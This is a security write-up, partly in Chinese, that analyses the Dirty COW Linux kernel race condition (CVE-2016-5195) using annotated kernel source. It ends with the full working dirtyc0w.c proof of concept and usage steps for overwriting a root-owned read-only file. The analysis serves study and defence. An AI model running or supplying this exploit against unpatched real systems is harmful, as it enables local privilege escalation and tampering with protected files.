CVE-2016-5195(DirtyCOW,脏牛)Kernel Local Privilege Escalation
一、Background Information
A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.
Relevant Link:
https://access.redhat.com/security/vulnerabilities/2706661
https://access.redhat.com/security/cve/cve-2016-5195
二、漏洞细节分析
0x1:mmap()
mmap() creates a new mapping in the virtual address space of the calling process. The starting address for the new mapping is specified in addr. The length argument specifies the length of the mapping.
#include <sys/mman.h> void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset); int munmap(void *addr, size_t length); 1. addr 1) If addr is NULL, then the kernel chooses the address at which to create the mapping; this is the most portable method of creating a new mapping. 2) If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the mapping will be created at a nearby page boundary. The address of the new mapping is returned as the result of the call. 2. length The contents of a file mapping (as opposed to an anonymous mapping), are initialized using length bytes starting at offset offset in the file (or other object) referred to by the file descriptor fd. offset must be a multiple of the page size as 3. prot The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file). It is either PROT_NONE or the bitwise OR of one or more of the following 1) PROT_EXEC: Pages may be executed. 2) PROT_READ: Pages may be read. 3) PROT_WRITE: Pages may be written. 4) PROT_NONE: Pages may not be accessed. 4. flags The flags argument determines whether updates to the mapping are visible to other processes mapping the same region, and whether updates are carried through to the underlying file. This behavior is determined by including exactly one of the following values in flags: 1) MAP_SHARED Share this mapping. Updates to the mapping are visible to other processes mapping the same region, and (in the case of file-backed mappings) are carried through to the underlying file. (To precisely control when updates are carried through to the underlying file requires the use of msync(2).) 2) MAP_PRIVATE Create a private copy-on-write mapping. Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file. It is unspecified whether changes made to the file after the mmap() call are visible in the mapped region.
这是一个相对比较常用的函数,这个函数的一个很重要的用处就是将磁盘上的文件映射到虚拟内存中,对于这个函数唯一要说的就是当flags的MAP_PRIVATE被置为1时,对mmap得到内存映射进行的写操作会使内核触发COW操作,写的是COW后的内存,不会同步到磁盘的文件
0x2:madvise
madvise - give advice about use of memory,The madvise() system call is used to give advice or directions to the kernel about the address range beginning at address addr and with size length bytes. Initially, the system call supported a set of "conventional" advice values, which are also available on several other implementations. (Note, though, that madvise() is not specified in POSIX.) Subsequently, a number of Linux-specific advice values have been added.
#include <sys/mman.h> int madvise(void *addr, size_t length, int advice); 1. *addr 2. length 3. advice advice values listed below allow an application to tell the kernel how it expects to use some mapped or shared memory areas, so that the kernel can choose appropriate read-ahead and caching techniques. These advice values do not influence the semantics of the application (except in the case of MADV_DONTNEED), but may influence its performance. All of the advice values listed here have analogs in the POSIX-specified posix_madvise(3) function, and the values have the same meanings, with the exception of MADV_DONTNEED. 1) MADV_NORMAL: No special treatment. This is the default. 2) MADV_RANDOM: Expect page references in random order. (Hence, read ahead may be less useful than normally.) 3) MADV_SEQUENTIAL: xpect page references in sequential order. (Hence, pages in the given range can be aggressively read ahead, and may be freed soon after they are accessed.) 4) MADV_WILLNEED: Expect access in the near future. (Hence, it might be a good idea to read some pages ahead.) 5) MADV_DONTNEED: Do not expect access in the near future. (For the time being, the application is finished with the given range, so the kernel can free resources associated with it.)
这个函数的主要用处是告诉内核内存addr~addr+len在接下来的使用状况,以便内核进行一些进一步的内存管理操作。当advice为MADV_DONTNEED时,此系统调用相当于通知内核addr~addr+len的内存在接下来不再使用,内核将释放掉这一块内存以节省空间,相应的页表项也会被置空
0x3:get_user_pages() race for write access
/source/mm/gup.c
//获取用户内存的核心函数 519 long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm, 520 unsigned long start, unsigned long nr_pages, 521 unsigned int gup_flags, struct page **pages, 522 struct vm_area_struct **vmas, int *nonblocking) 523 { 524 long i = 0; 525 unsigned int page_mask; 526 struct vm_area_struct *vma = NULL; 527 528 if (!nr_pages) 529 return 0; 530 531 VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET)); 532 533 /* 534 * If FOLL_FORCE is set then do not force a full fault as the hinting 535 * fault information is unrelated to the reference behaviour of a task 536 * using the address space 537 */ 538 if (!(gup_flags & FOLL_FORCE)) 539 gup_flags |= FOLL_NUMA; 540 541 do { 542 struct page *page; 543 unsigned int foll_flags = gup_flags; 544 unsigned int page_increm; 545 546 /* first iteration or cross vma bound */ 547 if (!vma || start >= vma->vm_end) { 548 vma = find_extend_vma(mm, start); 549 if (!vma && in_gate_area(mm, start)) { 550 int ret; 551 ret = get_gate_page(mm, start & PAGE_MASK, 552 gup_flags, &vma, 553 pages ? &pages[i] : NULL); 554 if (ret) 555 return i ? : ret; 556 page_mask = 0; 557 goto next_page; 558 } 559 560 if (!vma || check_vma_flags(vma, gup_flags)) 561 return i ? : -EFAULT; 562 if (is_vm_hugetlb_page(vma)) { 563 i = follow_hugetlb_page(mm, vma, pages, vmas, 564 &start, &nr_pages, i, 565 gup_flags); 566 continue; 567 } 568 } 569 retry: 570 /* 571 * If we have a pending SIGKILL, don't keep faulting pages and 572 * potentially allocating memory. 573 */ 574 if (unlikely(fatal_signal_pending(current))) 575 return i ? i : -ERESTARTSYS; 576 cond_resched(); //获取页表项 577 page = follow_page_mask(vma, start, foll_flags, &page_mask); 578 if (!page) { 579 int ret; //获取失败时会调用这个函数 580 ret = faultin_page(tsk, vma, start, &foll_flags, 581 nonblocking); 582 switch (ret) { 583 case 0: //重试 584 goto retry; 585 case -EFAULT: 586 case -ENOMEM: 587 case -EHWPOISON: 588 return i ? i : ret; 589 case -EBUSY: 590 return i; 591 case -ENOENT: 592 goto next_page; 593 } 594 BUG(); 595 } else if (PTR_ERR(page) == -EEXIST) { 596 /* 597 * Proper page table entry exists, but no corresponding 598 * struct page. 599 */ 600 goto next_page; 601 } else if (IS_ERR(page)) { 602 return i ? i : PTR_ERR(page); 603 } 604 if (pages) { 605 pages[i] = page; 606 flush_anon_page(vma, page, start); 607 flush_dcache_page(page); 608 page_mask = 0; 609 } 610 next_page: 611 if (vmas) { 612 vmas[i] = vma; 613 page_mask = 0; 614 } 615 page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask); 616 if (page_increm > nr_pages) 617 page_increm = nr_pages; 618 i += page_increm; 619 start += page_increm * PAGE_SIZE; 620 nr_pages -= page_increm; 621 } while (nr_pages); 622 return i; 623 } 624 EXPORT_SYMBOL(__get_user_pages); 214 struct page *follow_page_mask(struct vm_area_struct *vma, 215 unsigned long address, unsigned int flags, 216 unsigned int *page_mask) 217 { .. 这个函数会走页一级目录->二级目录->页表项的传统页式内存的管理流程 follow_page_pte(vma, address, pmd, flags); .. } 63 static struct page *follow_page_pte(struct vm_area_struct *vma, 64 unsigned long address, pmd_t *pmd, unsigned int flags) 65 { .. //如果获取页表项时要求页表项所指定的内存具有写权限,但是页表项所指向的内存并没有写权限,则会返回空 98 if ((flags & FOLL_WRITE) && !pte_write(pte)) { 99 pte_unmap_unlock(ptep, ptl); 100 return NULL; 101 } .. //如果获取页表项的请求不要求内存映射具有写权限的话会返回页表项 193 return page; 199 }
第一次获取页表项时,因为带入了写权限标志位,所以follow_page_mask返回空,所以控制流进入faultin_page
349 /* 350 * mmap_sem must be held on entry. If @nonblocking != NULL and 351 * *@flags does not include FOLL_NOWAIT, the mmap_sem may be released. 352 * If it is, *@nonblocking will be set to 0 and -EBUSY returned. 353 */ 354 static int faultin_page(struct task_struct *tsk, struct vm_area_struct *vma, 355 unsigned long address, unsigned int *flags, int *nonblocking) 356 { //处理page_fault 357 .. //如果是因为映射没有写权限导致的获取页表项失败,会自动去掉flags中的FOLL_WRITE标记,从而使当前获取页表项不再要求内存映射具有写权限 414 if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE)) 415 *flags &= ~FOLL_WRITE; 416 return 0; 417 } 3478 static int handle_pte_fault(struct fault_env *fe) 3479 { ... //页表为空,说明缺页,调用do_fault调页 3519 if (!fe->pte) { 3520 if (vma_is_anonymous(fe->vma)) 3521 return do_anonymous_page(fe); 3522 else 3523 return do_fault(fe); 3524 } .. //页表不为空,但是要写入的页没有写权限,这是可能需要COW 3552 if (fe->flags & FAULT_FLAG_WRITE) 3553 flush_tlb_fix_spurious_fault(fe->vma, fe->address); 3554 } 3555 unlock: 3556 pte_unmap_unlock(fe->pte, fe->ptl); 3557 return 0; 3558 }
假设我们通过Mappedaddr=mmap(NULL,filesize,PROT_READ,MAP_PRIVATE,fd,0);获取了一个只读文件的只读内存映射,然后创建两个线程,
- Thread1通过不断写/proc/self/mem来写Mappedaddr指向的位置
- Thread2不断调用madvice(Mappedaddr,len,MADV_DONTNEED)来将Mappedaddr的页表项置空
- write系统调用在内核中会执行get_user_pages以获取需要写入的内存页,get_user_pages函数会调用follow_page_mask函数寻找内存页对应的页表项,由于这是mmap后第一次对Mappedmem进行操作,所以Mappedmem所对应的页表为空,pagefault,get_user_pages调用faultin_page函数进行处理,faultin_page函数会调用handle_mm_fault进行缺页处理。
- 缺页处理时,如果页表为空,内核会调用do_fault函数调页,这个函数会检查是否是因为内存写造成的缺页以及该内存是否是以private方式map的内存,如果是,则会进行COW操作,更新页表为COW后的页表。并将返回值的FAULTFLAGWRITE位置为1
- get_user_pages会第二次调用follow_page_mask寻找页表项,follow_page_mask会调用follow_page_pte函数,这个函数会通过flag参数的FOLL_WRITE位是否为1判断要是否需要该页具有写权限,以及通过页表项的VM_WRITE位是否为1来判断该页是否可写。
- 由于Mappedmem是以PROT_READ和MAP_PRIVATE的的形式进行映射的。所以VM_WRITE为0,又因为我们要求页表项要具有写权限,所以FOLL_WRITE为1,从而导致这次寻页会再次触发一个pagefault,faultin_page会再次调用handle_mm_fault进行处理。
- 由于这次pagefault时页表不为空,所以不会执行do_fault函数调页,转而会去检查pagefault是否是由于要写不可写的地址导致的,如果是则会调用do_wp_page进行COW操作,不过值得注意的是,do_wp_page会进行一系列的检查来判断是否需要真的进行COW操作,如果没必要,则会直接REUSE原来的页来作为COW后的页。
- 因为在调页过程中已经进行过COW过了,所以直接reuse了调页COW后的内存页。之后handle_mm_fault的返回值的VM_FAULT_WRITE位会被置为1。接着faultin_page会通过判断handle_mm_fault返回值的VM_FAULT_WRITE位是否为1来判断COW是否顺利完成,以及通过页表项VM_WRITE位是否为1来判断该内存是否可写。
- 如果内存不可写且COW操作已经顺利完成,这说明mmap的内存区本来就是只读内存,因此为将FOLL_WRITE位置为0并返回到get_user_pages函数中
- get_user_pages第三次调用follow_page_mask进行寻页,注意此时的FOLL_WRITE已被置为0,也就是在寻页的时候不再需要页具有写权限。正常来说,这次寻页会成功的得到Mappedmem的页表项从而继续进行写操作。
- 但是如果这时Thread2通过madvise(Mappedmem,DONT_NEED)系统调用,通知内核Mappedmem在接下来不会被使用。内核会将Mappedmem所在页的页表项置为空。这样就再次导致了pagefault,内核会调用do_fault函数调页。不过由于这次寻页并不要求被寻找的页具有写权限,所以不会像步骤4那样产生COW。
- 1如果接下来get_user_pages第四次调用follow_page_mask进行寻页的话,会成功返回对应的页表项,接下来的写入操作会被同步到只读的文件中。从而造成了越权写
第一次获取内存的页表项会因为缺页而失败。get_user_page调用faultin_page进行缺页处理后第二次调用follow_page_mask获取这块内存的页表项,如果需要获取的页表项指向的是一个只读的映射,那第二次获取也会失败。这时候get_user_pages函数会第三次调用follow_page_mask来获取该内存的页表项,并且不再要求页表项所指向的内存映射具有可写的权限,这时是可以成功获取的,获取成功后内核会对这个只读的内存进行强制的写入操作
这个实现是没有问题的,因为本来写入/proc/self/mem就是一个无视映射权限的强行写入,就算是文件映射到虚拟内存中,也不会出现越权写。
- 如果写入的虚拟内存是一个VM_PRIVATE的映射,那在缺页的时候内核就会执行COW操作产生一个副本来进行写入,写入的内容是不会同步到文件中的
- 如果写入的虚拟内存是一个VM_SHARE的映射,那mmap能够映射成功的充要条件就是进程拥有对该文件的写权限,这样写入的内容同步到文件中也不算越权了
但是,在上述流程中,如果第二次获取页表项失败之后,另一个线程调用madvice(addr,addrlen, MADV_DONTNEED),其中addr~addr+addrlen是一个只读文件的VM_PRIVATE的只读内存映射,那该映射的页表项会被置空。这时如果get_user_pages函数第三次调用follow_page_mask来获取该内存的页表项。
由于这次调用不再要求该内存映射具有写权限,所以在缺页处理的时候内核也不再会执行COW操作产生一个副本以供写入。所以缺页处理完成后后第四次调用follow_page_mask获取这块内存的页表项的时候,不仅可以成功获取,而且获取之后强制的写入的内容也会同步到映射的只读文件中。从而导致了只读文件的越权写
三、POC
#include <stdio.h> #include <sys/mman.h> #include <fcntl.h> #include <pthread.h> #include <string.h> void *map; int f; struct stat st; char *name; void *madviseThread(void *arg) { char *str; str = (char*)arg; int i,c=0; for(i=0;i<100000000;i++) { /* You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661 > This is achieved by racing the madvise(MADV_DONTNEED) system call > while having the page of the executable mmapped in memory. */ c += madvise(map,100,MADV_DONTNEED); } printf("madvise %d\n\n",c); } void *procselfmemThread(void *arg) { char *str; str = (char*)arg; /* You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16 > The in the wild exploit we are aware of doesn't work on Red Hat Enterprise Linux 5 and 6 out of the box because on one side of > the race it writes to /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise Linux 5 and 6. */ int f = open("/proc/self/mem",O_RDWR); int i,c = 0; for(i=0; i<100000000; i++) { /* You have to reset the file pointer to the memory position. */ lseek(f,map,SEEK_SET); c+=write(f,str,strlen(str)); } printf("procselfmem %d\n\n", c); } int main(int argc,char *argv[]) { /* You have to pass two arguments. File and Contents. */ if (argc<3) return 1; pthread_t pth1,pth2; /* You have to open the file in read only mode. */ f = open(argv[1],O_RDONLY); fstat(f,&st); name=argv[1]; /* You have to use MAP_PRIVATE for copy-on-write mapping. > Create a private copy-on-write mapping. Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file. > It is unspecified whether changes made to the file after the mmap() call are visible in the mapped region. */ /* You have to open with PROT_READ. */ map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0); printf("mmap %x\n\n",map); /* You have to do it on two threads. */ pthread_create(&pth1, NULL, madviseThread,argv[1]); pthread_create(&pth2, NULL, procselfmemThread,argv[2]); /* You have to wait for the threads to finish. */ pthread_join(pth1,NULL); pthread_join(pth2,NULL); return 0;
}
usage
$ sudo -s echo this is not a test > foo chmod 0404 foo ls -lah foo gcc -o poc dirtyc0w.c -lpthread ./poc foo m00000000000000000 测试时使用一个低权限帐号,如果能向root专属的文件里写入内容,则说明利用成功
Relevant Link:
https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13 https://security-tracker.debian.org/tracker/CVE-2016-5195